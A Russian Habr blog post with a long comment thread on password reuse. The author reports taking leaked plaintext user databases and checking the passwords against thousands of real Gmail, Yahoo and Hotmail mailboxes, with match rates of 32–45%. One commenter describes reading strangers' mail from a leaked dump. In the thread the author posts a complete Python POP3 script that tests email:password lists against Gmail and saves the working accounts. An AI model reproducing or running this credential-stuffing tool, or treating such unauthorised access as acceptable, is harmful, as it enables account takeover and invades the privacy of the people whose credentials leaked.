Как «неизвестные хакеры» взламывают по пол интернета за раз

    image

    Несмотря на то что тема личной безопасности в сети уже изрядно всем надоела, люди продолжают наступать на те-же грабли. Многие всё ещё прячут все свои деньги и тайны за банальными паролями вроде «123».

    Хабро-опрос по топику тут.

    Тема навеяна моей личной статистикой «ковыряния» нескольких небезызвестных интернет-ресурсов.
    И согласно ей почти 40% пользователей используют один пароль для всего на свете.





    Благодаря тому что большинство сервисов пишутся наспех, ко мне в руки не раз попадали базы пользователей этих ресурсов. А последняя особенно порадовала — 35000 не хешированных записей. Все пароли хранились в открытом виде.

    Но интересны даже не учетные записи клиентов таких ресурсов, а тот факт что почти у половины юзеров пароль к сайту подходит к их почтовому ящику указанному в базе.

    Я учитывал только статистику по пользователям GMail, Yahoo и Hotmail, т.к. написание скриптов для проверки каждого нового специфического mail-сервиса отняло-бы пол жизни.
    image
    Конкретно по последнему случаю:
    Пользователей в базе -> 34731;
    Hotmail -> 10874; Совпадений -> 4348; 40%
    GMail -> 10143; Совпадений -> 3245; 32%
    Yahoo -> 7259; Совпадений -> 3266; 45%

    По личным наблюдениям и отзывам людей изучавших эти базы у 9 из 10 пользователей пароль к почте повторялся на всех остальных ресурсах, вплоть до платёжных систем.
    Это при том что почта это ключ ко всему что есть у юзера, его электронной жизни, личной переписке, восстановлению паролей. А многие этого просто не понимают.

    Может стоит задуматься?



    Названия электронных сервисов не называл по понятным причинам.
    Поделиться публикацией
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 140

      +22
      «Может стоит задуматься?»

      Нет, не стоит. Те, кого действительно заботит безопасность свой информации, не поступают так как те о ком вы писали выше. А остальным просто плевать, ведь их электронная жизнь только и состоит из аккаунта на одноклассниках и вконтакте.

      Хотя, конечно, статистика интересная, но не неожиданная.
        +9
        А вот здесь вы ошибаетесь. Если вы никогда не парсили руками подобную базу ящиков на предмет кг/ам, то не представляете сколько там можно найти интересного, в денежном эквиваленте.

        Те, кого действительно заботит безопасность свой информации, не поступают так

        Вы считаете что таких нет среди читателей хабра?
          +1
          Парсить — не парсил, но смотрел несколько десятков мыл из найденного в сети дампа одного форума на SMF (очевидно владелец снял хеширование паролей намеренно, так как по умолчанию на том движке она включена на уровне кода), пароли подходили где-то через раз, и смотрел пока не надоело. В основном там были письма от социальных сетей и всяких форумов, ну и иногда личная переписка.
          Естественно у каждого правила есть исключения, не хотелось расползаться сильно мыслью в предыдущем посте.

          «Вы считаете что таких нет среди читателей хабра?»
          Я выше писал не о пользователях хабра, а о пользователях интернетов вообще, сколько им не делай предупреждений — пароль 12345 будет рулить, и это будет продолжатся до тех пор, пока заботу о пароле не возьмёт на себя сервис (естественно это будет сопряженно некоторыми неудобствами для пользователя). Думаю что статистика стойкости паролей для мыла у пользователей хабра будет совсем иная, ведь «Аудитория проекта — прогрессивно мыслящие люди, интересующиеся будущим IT-рынка в целом и интернет-экономики в частности» а не школота и домохозяйки… хотя иногда я в этом начинаю сомневаться ;)
            0
            Я про Хабр написал только потому что иногда случается так, что «школота и домохозяйки», приходя сюда, в итоге становятся «прогрессивно мыслящими людьми».

            Я с вам полностью согласен. Тут от раза к разу. Но в данном случае сыграло свою роль то что ресурс был довольно узконаправленной тематики, подразумевавшей наличие у пользователей и Пай-Пала и интереса не только к соц-сетям.
            0
            Честно, припомню грешок был, сгенерил пароль и оставил его в коде, думал никто его не прочитает.
            В итоге летом пришлось дописывать пару фишек, меня не было в городе и код передали фрилансеру. По возвращении меня домой был поменян пароль (слава богу) только на контакте и на ящике. Я их быстро восстановил и теперь для ящика у меня вообще отдельный пароль. И тот хранится только в голове, называется научился на ошибках :)
          +2
          Пользователей можно разделить на 3 группы:
          1) кого не ломали и не обманывали
          2) наученные горьким опытом и те, кого обстоятельства обязывают использовать стойкие пароли
          3) пользователи, которым всё равно, ломанут их или нет
            0
            А меня забавно взломали на одном форуме по простому паролю и кинули людей на 200 или больше долларов. В итоге мой ник в гугле очень очернился на долгое время и сейчас ещё можно найти инфу что «я кидала».
            Потому ставлю сложные пароли ко всему что важно а если забываю — восстанавливаю по мылу, на котором тоже сложный пароль стоит, но который я помню.
            А сайты, где нужна регистрация на день — на них и пароли придумывать неохота, использую старый и простейший.
              0
              абсолютно согласен!
                +1
                В общем и целом согласен, но…
                Много лет использовал один пароль на всё.
                При этом не попадаю ни под одну категорию, просто со временем осознал, что зная пароль к мылу — можно поменять пароль на что угодно и.т.д…
                При этом меня не ламали, не обманывали и обстоятельств никаких особых не возникало.
                  0
                  я знаю человека, которого ломали, он жутко матерился и продолжал ставить цифровой пароль в виде даты рождения
                • НЛО прилетело и опубликовало эту надпись здесь
                    +2
                    Для левых сайтов на один раз обычно и ставят пароль типа 123456 и это в итоге отражается на статистике
                    –6
                    мне похуй
                    паролей всего два на все
                    я живу реальной жизнью
                    • НЛО прилетело и опубликовало эту надпись здесь
                      0
                      даже если есть простой пароль для какого то форума или сайта — у меня он никогда не совпадает с паролем от почты — тоже левой для спама, тоже с простым паролем, но с ДРУГИМ
                        +5
                        А меня KeePass Password Safe + DropBox выручает.
                        Первый хранит все пароли, а второй синхронизирует между всеми моими ПК.

                        • НЛО прилетело и опубликовало эту надпись здесь
                            0
                            Для того и DropBox чтоб они не потерялись.
                              +2
                              а как они накроются? они живут в файлике зашифрованном, который лежит на всех синхронизируемых компах + на дропбоксе.
                              Да и невероятно, что DropBox без бэкапов.
                                +3
                                потихоничку восстанавливать на мыло, пароль от которого не забывается.
                                • НЛО прилетело и опубликовало эту надпись здесь
                              +1
                              Здесь проблема ни сколько в безответственности, сколько в незнании. Многие «юзеры» придумали себе один раз «сложный» пароль и ставят его везде с мыслью «он же такой сложныыый»
                                +1
                                Ну а как их переубедить, что он простой и есть в словаре?.. Запрещать его применять? Допустим, а AD можно (и нужно!) это делать. А сервисам в интернете — не стоит, т.к. пароль будет запомнен браузером и пользователь его все-равно забудет — он же «сложный».
                                  0
                                  Вы смысл не так поняли. Смысл в том, что наоборот надо убирать всякие показатели сложности и просто внушать юзерам, что от сложности пароля шанс его вскрытия зависит гораздо меньше, чем от частоты его использования на разных сервисах
                                0
                                «т.к. написание скриптов для проверки каждого нового специфического mail-сервиса отняло-бы пол жизни.»
                                что-то я не понимаю, pop3 авторизация у всех разная чтоли?
                                  0
                                  Адреса этих pop3 шлюзов у всех разные, и искать их для ящиков которые в базе повторяются 1-2 раза не резон.
                                    +1
                                    nslookup, type MX, и т.д.
                                      0
                                      pop <> smtp
                                        0
                                        Я в курсе. Но сколько процентов разносит на разные сервера pop и smtp? Думаю, ничтожное количество.
                                  0
                                  На почту пароль >20 символов.
                                  На остальное еще штук 5 паролей, не самых простых.
                                  Ну и парочка для «зарегаться, скачать, свалить».
                                  Вполне хватает.
                                    –3
                                    я бы на почту меньше 40 не использовал
                                    • НЛО прилетело и опубликовало эту надпись здесь
                                    • НЛО прилетело и опубликовало эту надпись здесь
                                        0
                                        >20 подмножество >10 :)
                                          +1
                                          *включает
                                          0
                                          Нет, не слишком, т.к. я его прекрасно помню.
                                          0
                                          Зачем делать пароль более 10-15 символов? Если он бессмысленный, то подобрать его в наше время нереально. Зачем выдумывать?
                                            0
                                            Можно взять осмысленный, но очень длинный составной пароль. Пароль типа cjhjrnsczxj,tpmzyd;jgeceyekb,fyfy невозможно ни подобрать (не помешает пара арфаграфичезких ашипак), ни забыть. Но очень часто на длину пароля ставят ограничения.
                                          –1
                                          Интересно, если бы паролем была картинка, каково бы было? Подбирать их нелегко, пользователю можно дать сгенерированную, либо он выберет свою…
                                            0
                                            И кто мешает пользователю использовать одну картинку на всех ресурсах? Еще она будет храниться на его харде/флешке/где-нибудь еще ака прощай безопасность.
                                            Я уже не говорю про то, если мне надо будет зайти куда-нибудь из интернет-кафе или с телефона.
                                              0
                                              А как потом входить? Рисовать ?) Я так понимаю вы имели в виду каждый раз загружать картинку — в таком случае инета будет уходит немного больше, скорости не всем хватит для комфортной работы. В конечном счете это ничем не отличается (кроме проблем шифрования и сохранности самой картинки) от базы с паролями — без файла картинки никуда не зайдешь. А весь смысл запоминания паролей в том что ты можешь зайти на сайт из любой точки мира когда вздумается.

                                              У самого пара паролей в уме от почтовиков и нескольких важных сервисов, остальное лежит в базе Keepass'a под длиииинным паролем.
                                              0
                                              По орфографии:
                                              «нескольких небезЫзвестных»
                                              «почта — это ключ»
                                              По делу:
                                              У меня около 4 -5 паролей на разные сервисы + сложный пароль для контакта, ибо не хочется быть очередным лохом, рассылающим спам о GSM-локаторах…
                                                0
                                                Спасибо, поправил.
                                                  +4
                                                  конечно же вы не лох, но дело в том что длинна пароля трояну абсолютно по фонарю :)
                                                    +2
                                                    какая разница, какая длина пароля для вконтакте, если там пароль в открытом виде в бд лежит? Сделайте восстановление пароля и он вам его на блюдечке выложит :)
                                                      +1
                                                      несмотря на сложный пароль в контакте от меня умудрились разослать спам. лучшая защита от этого — удаление из вконтакта, что я и незамедлительно сделал.
                                                      0
                                                      до тех людей, который на почту ставять пароли qwerty не достучаться!
                                                        +1
                                                        У меня пасс один на все ресурсы, на которые мне глубоко пох (читай, одноразовые). На все остальное, важное для меня, разные пароли.

                                                        Понял, что так делать надо, когда поддерживал свой небольшой форум.
                                                          0
                                                          А я установил, чтобы Firefox при закрытии удалял все пароли и чистил журнал. И везде делаю так. Дополнительная мера безопасности.
                                                            –1
                                                            И надеетесь что трояны выходят на охоту только когда Firefox спит? :)
                                                              0
                                                              ну во первых постоянно проверяю комп, во вторых у меня mac
                                                              +2
                                                              Зачем вообще запоминать пароли, что бы потом их удалять?
                                                              0
                                                              Борьба должна исходить от самих создателей ресурсов, а не от стороны зачастую не опытных пользователей.
                                                              Хороший пример тому Твитер. Сервис ввел запрет на простые иностранные пароли и распространенные комбинации цифр — забота о пользователях + защита себя — разумно!
                                                                –3
                                                                мастдаи маст дай
                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                                      0
                                                                      Кстати, да, необходимый минимум по компьютерной безопасности не помешал бы. Гораздо лучше, чем срисовывать в тетрадь меню MS WORD.
                                                                      +2
                                                                      А я вот задумался)) Поменяю пожалуй пароль на почту, а может и вообще перееду на gmail :) Спасибо
                                                                        0
                                                                        Самое интересное в том, что я, почитав топик, как раз наоборот задумался о том, чтобы уехать с gmail'а (хотя на него полностью так и не перешёл) :)
                                                                          0
                                                                          Почему? Чем он плох?
                                                                          Я думал лучше ничего нету…
                                                                        0
                                                                        Как и следовало ожидать, пользователи Gmail самые продвинутые.
                                                                          0
                                                                          Если представить, что активный интернет-пользователь зарегистрирован на десятках сайтов…

                                                                          — одноклассники
                                                                          — вконтакт
                                                                          — жж
                                                                          — мойкруг
                                                                          — хабр
                                                                          — ннм
                                                                          — форум 1


                                                                          — форум 15
                                                                          — сайт знакомств 1
                                                                          — сайт знакомств 2
                                                                          — сайт знакомств 3
                                                                          — платежная система ЯД
                                                                          — платежная система Вебмани
                                                                          — торрент-трекер 1
                                                                            +1
                                                                            — торрент-трекер 2
                                                                            — торрент-трекер 3
                                                                            — торрент-трекер 4
                                                                            — ластфм
                                                                            — имхонет

                                                                            что ещё забыли?

                                                                            То практически нереально ставить разные пароли. Хранить их на телефоне/кпк под одним сложным паролем — неудобно. Вот и придумывается на все «социальные сервисы» один пароль… Который точно не забыть. Возможно, это и не страшно — если конечно пароли на этих сайтах хранятся не в открытом виде. Лишь бы с почтой они не совпадали на всякий случай.
                                                                              –1
                                                                              Сколько не спорьте на пути «Голова -> Клавиатура» много снифферов не поставишь. =)
                                                                              Все эти Хранилища-паролей убиваются простым мониторингом буфера обмена(нешифрованного кстати). Ну может почти все.
                                                                                0
                                                                                Под линукс не так много сниферов, а вообще антивирусы для этого и созданы. К тому же keyloger'ов не меньше, обычно «шпионское» ПО снимает сразу и с клавиатуры и из буфра и даже скриншоты делать может.
                                                                                  0
                                                                                  Толковые 0-day руткиты, которые пишут и содержат умные ребята, курят эти антивирусы после завтрака.
                                                                                  Всё обходится, всё перехватывается. Потому о них толком ничего неизвестно.
                                                                                    0
                                                                                    Тогда разницы между хранением паролей в базе и запоминанием нет. Только программой, имхо, пользоваться удобнее.
                                                                                      +2
                                                                                      как раз на случай таких ребят, в интернет кафе (дома почему-то не так страшно) я всегда параноидально вбиваю пароль не последовательно а вразброс, прописывая лишние символы и потом их удаляя, а также перемещаясь между некоторыми символами кликами мыши
                                                                                      • НЛО прилетело и опубликовало эту надпись здесь
                                                                                          –1
                                                                                          Покажите мне кейлогер который следит за перемещениями с помощью мыши и делает снимки экрана. А этот способ защиты заставит злоумышленников перебирать n! (факториал) паролей, где n — кол-во символов в пароле.
                                                                                          • НЛО прилетело и опубликовало эту надпись здесь
                                                                                              0
                                                                                              Кейлогеры более распространены в отличии от подобных троянов.
                                                                                              • НЛО прилетело и опубликовало эту надпись здесь
                                                                                  0
                                                                                  >Вот и придумывается на все «социальные сервисы» один пароль… Который точно не забыть

                                                                                  Можно придумать способ однозначного составления пароля на основе названия сервиса.
                                                                                    +2
                                                                                    Почему пароли неудобно хранить в специальной программе? Keepass очень удобно копирует пароль в буфер, через 10 сек. удаляет его от туда. Сел за комп, ввел мастер пароль и работай себе спокойно. Бэкап на кпк, dropbox'e, сервере, флешке etc.
                                                                                      0
                                                                                      «Бэкап на кпк, dropbox'e, сервере, флешке etc» vs «Бэкап только в голове». ;)
                                                                                    0
                                                                                    Я открыл для себя LastPass.
                                                                                    Система сама вводит пароли :)
                                                                                  +2
                                                                                  когда возникает мысль: «блииин, надо срочно поменять пароль на %mega-pass-iz-50-simvolov%», нужно хотя бы на бумажку записать и положить куда-нибудь на время, что бы потом не рвать волосы на %mesto% с криками «да что ж такое то» )
                                                                                    +1
                                                                                    Или положить бумажку на какое-нибудь время на видное место и так же «рвать волосы на %mesto% с криками «да что ж такое то»»
                                                                                    +1
                                                                                    Бывают пользователи со сложными паролями, но они написаны на бумажке которая приклеена к монитору :)
                                                                                    Хотя это наверно лучше чем пароль — 123456

                                                                                    Ну и какой от сюда вывод? Думаю разработчикам надо тоже использовать словари, только в другом ключе — при создании акка сверять пароль со словарём, ну дальше понятно ))
                                                                                      0
                                                                                      Классно перебирать пароли по словарю из нескольким миллионов ключевых фраз. А если еще учесть что эти словари с каждым днем становятся все толще и толще то вообще радости будет на неделю) К тому же в одну базу пароль может и не попасть, а вот в другую спокойно.

                                                                                      Помоему проще пользоваться генератором — пару раз клацуть на «сгенерировать» или мышкой поколбаситься в окне (для параноиков) и все ок.
                                                                                        –1
                                                                                        все эти генераторы так же служат для пополнения баз :) ты щёлкнул один раз и получил пароль, а бот щёлкнул сто тыщ мильонов раз и пополнил базу твоим же паролем :)
                                                                                          +1
                                                                                          Сто тыщь мильонов раз я не щелкну, к тому же базы составляются не генераторами паролей. Насколько я знаю берется часто используемый пароль и генерируется целая цепочка всевозможных его видоизменений: с разным регистром, заменой букв на цифры, приписыванием цифр(типа kolja123) и т.д.
                                                                                          Таким же образом генерят пароли состоящие из русских слов введенных на англ. раскладке.
                                                                                          Но никто не будет забивать в словарь миллионы бессмысленных символов-фраз, вероятность «попадания» очень низкая. Подбирать такие пароли уже работа брутфорса, там и база никакая не нужна, но время подбора очень большое.
                                                                                          0
                                                                                          Проще тогда брать слово из словаря, которое не забудешь, и прикручивать к нему немного случайных чисел. Стойкость в итоге такая-же, а запомнить проще.
                                                                                          +1
                                                                                          когда последний раз к Вам домой пробирался хакер, чтобы помониторить наличие бумажек у вас приклеиных к монику? :)
                                                                                          0
                                                                                          У меня пароль 28 символов (верхний и нижний регистры, цифры и спец символы)

                                                                                          :)
                                                                                            –2
                                                                                            вопрос не в качестве, а в количестве :)
                                                                                              +1
                                                                                              дык у меня и количество и качество не хромает
                                                                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                0
                                                                                                Вы серьёзно?
                                                                                                С нормальным вводом под 100 слов в минуту такой пароль стабильно вводиться за 3 секунды.
                                                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                    0
                                                                                                    Каждый десятый раз ошибаюсь, повторный набор с перегрузкой занимает 5-10 секунд.
                                                                                                    Если пальцы неудобно лежат, а я в плохом состоянии, ничего не происходит, набор текста не страдает.
                                                                                                    Никогда не чертыхаюсь при ошибках — чему там чертыхаться?
                                                                                              –1
                                                                                              Очередное разжевывание темы личной безопасности в сети и парольной аутентификации, как же все это надоело, если человеку информация действительно дорога он подумает о ее безопасности и это доказывают комментарии выше.
                                                                                              Всю ту статистику, что вы привели, попробуйте поизучать ее более внимательно, что вы там найдете интересного, кроме полупустых страничек ВК и ОД? Так ли много действительно критичных и конфиденциальных данных можно оттуда достать?
                                                                                              Второе что хотел сказать, так это то, что в данной ситуации задумываться так же стоит и владельцам таких форумов/порталов/сайтов которые в БД хранят пароли в открытом виде, это вообще безалаберность какая то.
                                                                                              Так же следует расставлять приоритеты. Я сам имею не очень сложный пароль на нескольких сервисах, при этом сервисы эти не настолько критичны для меня, типа мелких форумов на один два раза, временных ящиков и т.д. И естественно для более важных систем (админки хостингов/регистраторов/доступов к БД/почта/и т.д. ) пароли абсолютно разные и достаточно стойкие.
                                                                                                +2
                                                                                                ~20% ящиков содержат критические для их хозяина данные. Так или иначе. Уж поверьте.
                                                                                                –10
                                                                                                Я учитывал только статистику по пользователям GMail, Yahoo и Hotmail, т.к. написание скриптов для проверки каждого нового специфического mail-сервиса отняло-бы пол жизни.


                                                                                                Пардон, но ты ах*ел???

                                                                                                учитывал он статистику… пол-жизни бы заняло…

                                                                                                Уважаемый, пишите ПРАВИЛЬНО: «использовал статистику программы, скаченную тут и тут.»

                                                                                                у нас в РФ 80% быдло-юзеров используют mail, yandex, rambler…
                                                                                                данный скрипт который, Вы демонстрируете, используется на западе…
                                                                                                Если Вам действительно интересна данная тематика, и ВЫ САМИ можете написать такой скрипт, Вы впервую же очередь написали бы для mail, yandex & rambler но никак не для забугорных почтовиков…

                                                                                                Данная тема известна уже с конца 90-ых… а Вы тут в новом 2010 поднимаете «ОООО мляяя!!! галактико вопасносте!!! я открою Вам глаза на происходящее...»

                                                                                                пардон но уже накипело…

                                                                                                Давайте тыкать ещё раз всех в одно и тоже УГ…
                                                                                                и повторят «Вы все г*вно!!! используете один и тот же пароль на всё!!! у Вас пароль qwerty или 12345. Вас взломают злые хакеры!!!»

                                                                                                я полностью соглашусь с автором первого комента: «те кому это нужно...», те знают и соблюдают правила… а те кто не соблюдает… тому это НЕ НУЖНО… и хоть ты обламай ихние вконтакте, одноклассники и всю остальную ЖЖ… они не будут менять ничего…
                                                                                                  +1
                                                                                                  То какие почтовые сервисы использовать юзверям забугорных сайтов решать не мне.
                                                                                                  Раз база с иностранного ресурса то и посетители у него будут «не быдло-юзеры из РФ, со своими mail.ru».
                                                                                                  Всёж вы видели, всёж вы знаете…
                                                                                                    –4
                                                                                                    так почему Вы пишите так, что воспринимается как обращением к РУ-территории?
                                                                                                    почему пишете здесь на хабре?
                                                                                                    почему на русском?

                                                                                                    или Вы забыли добавить «нуууу туппыыыеее» (с)Задорнов?
                                                                                                      +2
                                                                                                      Значит вы всё неправильно воспринимаете.
                                                                                                      Топик не о скрипте вообще.
                                                                                                      Вы знаете иностранный аналог Хабра?
                                                                                                      Считаете что раз Русский то юзай мейл.ру — gmail.com для варваров?
                                                                                                        –7
                                                                                                        Вы читать комментарии умеете?

                                                                                                        Подъитожу мой коммент выше:
                                                                                                        1. Данная тема стара как мир и кричать «стоит задуматься» уже не надо. Все всё знают и без Вас. вы Америку не открыли
                                                                                                        2. Вы врёте насчёт скриптов (не Вы написали его(их), упоминая «ушло бы полжизни», явно указывая на своё причастие к данному процессу).
                                                                                                        ___________

                                                                                                        Отвечаю на Ваш пост:
                                                                                                        1. Аналог хабра есть, гугл в помощь
                                                                                                        2. Если Вы уверены в том что пишите, приведите цитату из моего комента где было бы указано на «раз Русский то юзай мейл.ру — gmail.com для варваров»
                                                                                                          +2
                                                                                                          1. Но тем не менее в этих двух топиках нашлись те кто задумался. Это только те кто отписался.
                                                                                                          2. Где вы видели в тексте мой копирайт на этих скриптах? Скрипт написан на питоне, изначально предназначался для Yahoo. В сети таких полно. Позже был адаптирован мной под остальные сервисы, но увы не под все. Просто я умею соизмерять время потраченное на проверку 2х-3х экзотических ящиков с возможной выгодой от этого. Уж простите меня что я пишу не на питоне.
                                                                                                          И 3. Вы уже просто придираетесь к словам.
                                                                                                            –5
                                                                                                            в слове сила! просто так бросаться словами вы научились, а отвечать, видать не особо.

                                                                                                            1. кто задумался прочитав это, мне их жалко, потому что на данные вещи мозги должны изначально настроены верно, а то что прочитав в очередной раз основу из основ, пардон и это не поможет… позадумываются и забудут через два часа про данный топик вообще.
                                                                                                            2. знаю я эти адаптации… написан скрипт, где есть входящие параметры, куда и вбиваются нужные значения для любого (практически любого) сервиса… а Вы так уверенно говорите «адаптирован мной». Не надо делать из двухкликового движения эпохальный кодинг и дебагинг.
                                                                                                            3. Вообщем… смысл дальнейшего обсуждения не имеет никакого смысла, я своё мнение высказал.
                                                                                                              +1
                                                                                                              Вот вам скрипт. Один из них.
                                                                                                              #!/usr/bin/env python

                                                                                                              import sys, poplib

                                                                                                              if len(sys.argv) != 2:
                                                                                                              printHelp()
                                                                                                              exit(1)

                                                                                                              SAVEFILE = 'valids.txt'
                                                                                                              HOST = 'pop.gmail.com'
                                                                                                              PORT = 995

                                                                                                              currline = 0
                                                                                                              valid = []
                                                                                                              maillist = sys.argv[1]

                                                                                                              try:
                                                                                                              handle = open(maillist)
                                                                                                              except:
                                                                                                              exit(1)

                                                                                                              for line in handle:
                                                                                                              currline += 1
                                                                                                              try:
                                                                                                              email = line.split(':')[0]
                                                                                                              password = line.split(':')[1].replace('\n', '')
                                                                                                              except:
                                                                                                              exit(1)

                                                                                                              try:
                                                                                                              pop = poplib.POP3_SSL(HOST, PORT)
                                                                                                              pop.user(email)
                                                                                                              pop.pass_(password)
                                                                                                              valid.append(email + ':' + password)
                                                                                                              print '[+] Checking: %s <%s> -> Valid!' % (email, password)
                                                                                                              pop.quit()
                                                                                                              except:
                                                                                                              print '[+] Checking: %s <%s> -> Invalid!' % (email, password)
                                                                                                              pass

                                                                                                              handle.close()
                                                                                                              print '\n[+] Total Valid: %s' % len(valid)

                                                                                                              if len(valid) > 0:
                                                                                                              save = open(SAVEFILE, 'a')

                                                                                                              for email in valid:
                                                                                                              save.write(email + '\n')

                                                                                                              save.close()

                                                                                                              print '[+] The valid accounts are saved in "%s".' % SAVEFILE


                                                                                                              бросаться словами вы научились, а отвечать, видать не особо.

                                                                                                              В каком месте, простите? Причем такими за которые не могу ответить.
                                                                                                              Почему всегда находится тот кто считает себя умнее всех?
                                                                                                              Можете не отвечать. Разговор закончен.
                                                                                                                0
                                                                                                                вот мне выдал яндекс:
                                                                                                                код датируется 01.08.2009

                                                                                                                и там стоит:
                                                                                                                print "*Multi Account Checker !!!*"
                                                                                                                print "* Gmail — Hotmail — Yahoo *"
                                                                                                                print "* Coded by P47r1ck! *"
                                                                                                                print "* www.darkc0de.com *"
                                                                                                                print "* 07/2009 *"

                                                                                                                так что указали бы данную вещь я бы промолчал…
                                                                                                                а тут пардон… выдавать чужое за своё… это называется ВОРОВСТВО
                                                                                                                  +4
                                                                                                                  Хм, действительно код скопипастан. Но Вы тоже хороши, не стоит всё так близко к сердцу воспринимать и кричать на весь Хабр.
                                                                                                                    –1
                                                                                                                    виноват-виноват :(
                                                                                                                    но просто накипело уже… очередной скрипт-кидис, очередной «мир в опасносте», «а мужики-то не знали»…
                                                                                                  0
                                                                                                  А может все же стоит не перекладывать всю вину от взломов простых паролей на пользователей?
                                                                                                  Есть способы как защитить аккаунт не только паролем. Хорошая реализация этого: привзяка по IP, если сеть поменялась высылаем на номер мобильного телефона активационный код. — Я согласен есть способы обойти и эту защиту, но это элементарная забота о своих пользователях — правда, в российских сервисах это развито плохо.
                                                                                                    0
                                                                                                    Webmoney так и делает… и Вконтакт делает потуги по привязке аккаунта к номеру мобильника.
                                                                                                    +1
                                                                                                    Keepass+nnbackup
                                                                                                      +1
                                                                                                      Там где есть что охранять, охраняют.

                                                                                                      Взломать и получить доступ к информации в Сети зачастую не менее просто, чем сделать — тоже в реале.
                                                                                                      Все зависит от значимости этой информации. Я зарегистрирован на более чем 150 (примерно) ресурсах и на 90% из них у меня стоит один и тот же пасс. Все потому, что значимость их для меня ничтожно мала, и потеря этого пасса мало скажется на моей личной жизни.

                                                                                                      Если бы эти ошибки допускала какая нибудь теле звезда, возможно для нее последствия были бы хуже. Но большинство из нас простые, люди. Взламывая нас ни один хакер не сможет ничего извлечь, кроме завышения самооценки, ну может жизнь подпортит слегка какими нибудь пакостями, но для этого надо этому хакеру на ногу наступить или еще как нибудь навредить.

                                                                                                      1 Хороший взломщик такая же редкость как 1 хороший спортсмен, их нет столько, чтоб нас всех взламывать, и нашу супер секретную информацию в корыстных целях использовать. Поэтому и ломают чаще высокопоставленных людей.

                                                                                                      Хотя у меня раз аську сперли, вот было обидно.

                                                                                                        0
                                                                                                        даеш анализатор днк адаптированый под ворпресс и любимый порносайт, там брутфорсом не возьмеш.

                                                                                                        а если серьезно то вполне хватит провайдерского мыла или настроить почту через собственный домен что бы ленивому хакеру было не в кайф прописывать ваш pop/imap
                                                                                                          0
                                                                                                          Может стоит задуматься хотмайл, гмайлу за тупой брут аков с одного ИП?
                                                                                                            0
                                                                                                            перебор огромного кол-во мыл с 1 паролем результат даёт потрясающий, и пароль может оказаться совсем не такой о которых речь в статье, а нпример вот такой
                                                                                                            2hbfg&^@#_sы@!( B!@U*Yg
                                                                                                              0
                                                                                                              Ладно, все. Это пост стал последней каплей, серьезно.

                                                                                                              Включил генератор паролей и закрыл 22-значными паролями почту, твиттер и разное другое более или менее ценное. Распечатал пароли на бумажке (без подробностей, какой от чего), буду пытаться выучить их наизусть. 3-4 реально очень сложных (регистры, знаки, цифры) 22-значных паролей должно хватить на какое-то время. Больше я все равно не запомню, кажется :((

                                                                                                              Фигня еще в том, что я часто работаю за совершенно чужими компами — так что реально прийдётся все запоминать :/ Может, какие-то способы запоминания есть?..
                                                                                                                –1
                                                                                                                «25-ый кадр — это реально работает» :)
                                                                                                                  0
                                                                                                                  Ой, ну да ладно. Я ж серьезно. Поди ж упомни кучу бессмысленно нечитаемой белиберды… :(
                                                                                                                    0
                                                                                                                    главно не вызвать демона случайно :)
                                                                                                                  0
                                                                                                                  Хорошо помогает механическая память мышц. Сейчас до сих пор помню около десяти 8-мизначных паролей состоящих из букв английского алфавита разного регистра, спец. символов и цифр. Просто приходилось их часто вводить руками, а не ctrl+c > ctrl+v, и теперь я быстрей введу эти пароли руками, один раз взглянув на клавиатуру, чем вспомню и произнесу их.
                                                                                                                    0
                                                                                                                    Только это не память мышц. 8) Так же помню примерно десяток восьми символьных, визуально траекторию над клавиатурой запоминаю по точкам. Ну и где точка — там символ. 8)
                                                                                                                    0
                                                                                                                    Ну вот скажите, зачем этот фанатизм и крайности? Ведь при брутфорсе обычно проверяют на самые распространённые типа asdfg, qwerty и прочие. Если очень нужно, иногда по словарю брутят, но это мало где возможно, да и очень долго.

                                                                                                                    А если уведут пароли трояном, сольют базу или при помощи ректального криптоанализа, тогда даже самые хитрый пароль не спасёт. Хотя, наверное, чисто психологически чувствуешь себя в безопасности.

                                                                                                                    Ведь проще же запомнить что-то типа:
                                                                                                                    любимаяКнига_любимыйФильм_123!!!
                                                                                                                      +1
                                                                                                                      Я себе придумал метод — делать пароли из химических формул=)
                                                                                                                      Например, на сервер у меня был пароль вида: _H2o2^C2h5Oh_
                                                                                                                      Запоминается по правилу: подчеркивание, формула перекиси водорода, значок «крышечки», формула спирта, подчеркивание и правило прыгающих букв :)
                                                                                                                      Знаю, что пишется сложно — но на деле оказалось очень даже просто :)
                                                                                                                      0
                                                                                                                      А подскажите пожалуйста при помощи чего можно писать такие скрипты которые описаны в статье?
                                                                                                                        0
                                                                                                                        perl, python, shell
                                                                                                                          –1
                                                                                                                          Как начинающему, советую «unix shell»
                                                                                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                                            0
                                                                                                                            своими аккаунтами на чужих компах не пользуюсь, посему записываю пассы в блокнотик, а логины и ресурсы к ним запоминаю… ну и надо не забывать что люди которые юзают пасы типа 123, сами прекрасно понимают что это не пароль, им просто пофигу уведут у них акк или нет
                                                                                                                              +1
                                                                                                                              Ох щас напишу.

                                                                                                                              Тут на хабре не раз придумывали схемы по легкой генерации пароля на основе доменного имени.

                                                                                                                              Ну так и чо? Ну фигня же — сел на Javascript написал букмарклет который генерит пароль.
                                                                                                                              Букмарклет у вас в барузере. Синхронизация закладок между рабочей и домашней машиной. Либо открытый код + секретный суперпароль.

                                                                                                                              Ох, скажите вы, а чо рядовой пользователь на js врядли чо то писать будет. Да врядли знает что такое букмарклет.
                                                                                                                              Да и «парольная проблема» ему вообще не понятна и неинтересна.

                                                                                                                              Т.е что это получается? Тот кто проблему видит — для себя ее решил. Тот кто не видит — не увидит пока петух в жопу не клюнет не пострадает. И все эти статьи, скрипты, доказательства и топики на хабре про пароли врядли комуто вправят мозг.
                                                                                                                                0
                                                                                                                                Полностью с Вами согласен. У меня самого два пароля. Я их не меня в полном понимании «поменять». Буквально менял местами. И проблема не в том что мне не страшно… даже некоторые знакомые пароли знают (внезапно).
                                                                                                                                Я бы может их и поменял (очень хочется, честно!), если бы не было влом придумывать новые, и что ещё страшней — снова учиться набирать.

                                                                                                                                Так что ждём волшебного петуха… волшебного пендаля… или что там приходит…
                                                                                                                                  0
